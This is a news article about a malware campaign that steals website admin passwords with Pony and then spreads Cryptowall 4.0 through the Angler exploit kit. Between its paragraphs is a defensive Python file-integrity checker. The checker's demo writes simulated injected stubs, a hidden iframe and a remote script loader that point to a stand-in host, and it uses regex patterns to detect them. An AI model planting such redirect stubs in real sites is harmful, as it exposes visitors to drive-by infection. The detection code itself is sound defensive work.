Domination: Crims steal admin logins, infect sites, drop Cryptowall 4

World's worst password-stealer + world's worst exploit kit + world's worst ransomware.

Virus slingers who find themselves unsatisfied by merely ruining computers with ransomware are now first stealing a victim's admin passwords to enslave their websites into attack campaigns.

The battery starts with the installation of the Pony malware, which in 2013 stole some two million passwords through its global botnet.

Pony can also plunder passwords from more than 100 applications, social media sites, and Google accounts.

It is not clear how that initial Pony infection takes place, however.

Heimdal Security bod Andra Zaharia says stolen passwords are used to upload scripts to a victim's site before users are pushed to malicious drive-by-download pages.

There the infamous Angler exploit kit delivers the as-yet insurmountable Cryptowall 4.0 ransomware.

"The campaign is carried out by installing a cocktail of malware on the compromised PC … which systematically harvests all usable usernames and passwords from the infected system and sends them to a series of control and command servers controlled by the attackers," Zaharia says.

"The Angler exploit kit will then scan for vulnerabilities in popular third party software and in insecure Microsoft Windows processes, if the system hasn’t been updated.

"Once the security holes are identified, Angler will exploit them and force-feed Cryptowall 4.0 into the victim’s system."
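The step that turns a stolen admin password into a drive-by landing page is the upload of attacker scripts to the legitimate site. One defender-side control for catching that is a baseline-and-diff integrity check of the web root, flagging new or altered files whose content looks like an injected redirect. The script below is an added example and is not code from Heimdal, Trend Micro or the article; the hidden-iframe and foreign-script heuristics, the sample site layout and the `example.invalid` host are all constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed heuristics: a zero-size iframe or a script tag loading from an
# external origin is the typical redirect stub dropped into a compromised page.
INJECT_PATTERNS = [
    re.compile(r"<iframe[^>]*(?:width|height)\s*=\s*[\"']?0", re.I),
    re.compile(r"<script[^>]*src\s*=\s*[\"']https?://", re.I),
]


def build_manifest(root):
    """Map every file under root (relative path) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        manifest[str(path.relative_to(root))] = digest
    return manifest


def diff_manifest(baseline, current):
    """Return (added, modified, removed) relative paths between two manifests."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def suspicious_files(root, paths):
    """Among the given relative paths, return those matching an injection pattern."""
    hits = []
    for rel in paths:
        text = (Path(root) / rel).read_text(errors="replace")
        if any(pat.search(text) for pat in INJECT_PATTERNS):
            hits.append(rel)
    return hits


def demo():
    """Constructed scenario: baseline a clean site, simulate tampering, report findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body><h1>Shop</h1></body></html>")
        (root / "css").mkdir()
        (root / "css" / "site.css").write_text("body { margin: 0 }")
        baseline = build_manifest(root)

        # Simulated tampering (constructed): a hidden-iframe redirect appended to
        # index.html and a new loader script dropped into the web root.
        with open(root / "index.html", "a") as f:
            f.write('<iframe src="http://example.invalid/gate.php" width="0" height="0"></iframe>')
        (root / "jquery-min.js").write_text(
            "document.write('<script src=\"http://example.invalid/ek.js\"></script>')"
        )

        added, modified, removed = diff_manifest(baseline, build_manifest(root))
        flagged = suspicious_files(root, added + modified)
        return {"added": added, "modified": modified, "removed": removed, "flagged": flagged}


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is taken from a known-good deployment and stored off the web server, so an attacker holding the site's admin password cannot also rewrite the reference hashes; the diff is then run on a schedule or from a deploy hook and any hit is reviewed before the page is served again.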

Zaharia says the campaign is "extensive" and operates from six bulletproof hosting servers in Ukraine.

It is one of the most complex, and likely one of the most effective, ransomware attacks to date, combining the latest Cryptowall variant, released less than a month ago, with Angler, the world's most effective and popular exploit kit.

Other web scum have taken to recruiting victims into an affiliate program.

Chimera has begun recruiting ransomware victims into an affiliate program where they can gain a 50 percent profit split for spreading the malware, Trend Micro threat man Anthony Joe Melgarejo says.

They are not excused from paying the one Bitcoin ransom, however. ®
